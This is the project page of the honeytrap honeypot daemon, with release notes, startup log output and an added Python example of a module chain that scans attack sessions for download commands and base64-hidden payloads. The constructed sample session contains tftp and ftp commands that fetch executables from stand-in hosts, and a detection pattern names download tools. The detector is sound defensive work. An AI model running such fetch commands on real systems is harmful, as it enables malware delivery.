Latest Release
Version 1.0.0: Revised configuration concept with more flexible module handling; analysis plugins can now create virtual attacks; 3 new plugins.
Download
Honeytrap source packages are available from the SourceForge download repositories.
honeytrap
A Dynamic Meta-Honeypot Daemon
Honeytrap is a low-interaction honeypot daemon for observing attacks against network services. In contrast to other honeypots, which often focus on malware collection, honeytrap aims at catching the initial exploit. It collects and further processes attack traces.
Being able to process unknown attacks means that no prior knowledge about a protocol or vulnerability can be used. However, an incoming connection still has to be handled in a meaningful manner. For this purpose, honeytrap implements a dynamic server concept: it monitors the network stream for incoming sessions and starts appropriate listeners just in time. Each listener can handle multiple connections and terminates itself after some idle time.
Below is the output of honeytrap 1.1.0 (svn version):
honeytrap v1.1.0 - Initializing.
  Loading plugin magicPE v0.0.1
  Loading plugin ftpDownload v0.5.3
  Loading plugin tftpDownload v0.4.1
  Loading plugin b64Decode v0.3.1
  Loading plugin vncDownload v0.3
  Loading plugin SaveFile v0.2.1
  Loading plugin submitPostgres v0.1.1
  Servers will run as user honeytrap (1004).
  Servers will run as group nogroup (65534).
  Loading default responses.
  Connections will be handled in mirror mode by default.
  Logging to /opt/honeytrap/honeytrap.log.
  Initialization complete.
honeytrap v1.1.0 Copyright (C) 2005-2008 Tillmann Werner
[2009-04-10 16:33:56] ---- Trapping attacks via NFQ. ----
[2009-04-10 16:34:11] ---- honeytrap stopped ----
Incoming data is handled as a byte stream per session. This stream can be processed by different modules, e.g., for matching against certain patterns, decoding (for example base64 or XOR-ed shellcode), virus scanning, or execution of malware download commands.
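To illustrate the module concept described above, here is an added example (not honeytrap's own code) of a small processing chain over a session byte stream: a pattern-matching module extracts download commands, a decoding module unpacks base64 tokens, and decoded output is fed back through the chain so that a command hidden inside an encoded blob is still recorded. The session data, host addresses and file names are constructed for the example.

```python
import base64
import binascii
import re
from collections import deque

# Constructed sample session (not captured traffic): a command sequence with a
# tftp download command and a base64 blob that hides a second download command.
INNER = b"ftp -s:198.51.100.7 GET payload.bin"
SESSION = (b"cmd /c tftp -i 192.0.2.10 GET update.exe & echo "
           + base64.b64encode(INNER) + b" | base64 -d\r\n")

# Module 1: pattern matching for common download commands in the stream.
DOWNLOAD_RE = re.compile(rb"\b(tftp|ftp|wget|curl)\b[^\r\n|&]*")

def match_download_cmds(data: bytes) -> list:
    """Return every download-command candidate found in the byte stream."""
    return [m.group(0).strip().decode("latin-1")
            for m in DOWNLOAD_RE.finditer(data)]

# Module 2: base64 decoding of tokens long enough to carry a payload.
B64_RE = re.compile(rb"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}")

def decode_base64(data: bytes) -> list:
    """Return decoded payloads for base64-looking tokens; invalid ones are skipped."""
    out = []
    for m in B64_RE.finditer(data):
        try:
            out.append(base64.b64decode(m.group(0), validate=True))
        except (ValueError, binascii.Error):
            continue
    return out

def process_session(data: bytes, max_depth: int = 3) -> list:
    """Run the modules over a session stream. Decoded payloads are re-queued
    (bounded by max_depth) so nested encodings are analysed as well."""
    findings = []
    queue = deque([(data, 0)])
    while queue:
        stream, depth = queue.popleft()
        for cmd in match_download_cmds(stream):
            findings.append({"depth": depth, "command": cmd})
        if depth < max_depth:
            for decoded in decode_base64(stream):
                queue.append((decoded, depth + 1))
    return findings

if __name__ == "__main__":
    for finding in process_session(SESSION):
        print(finding)
```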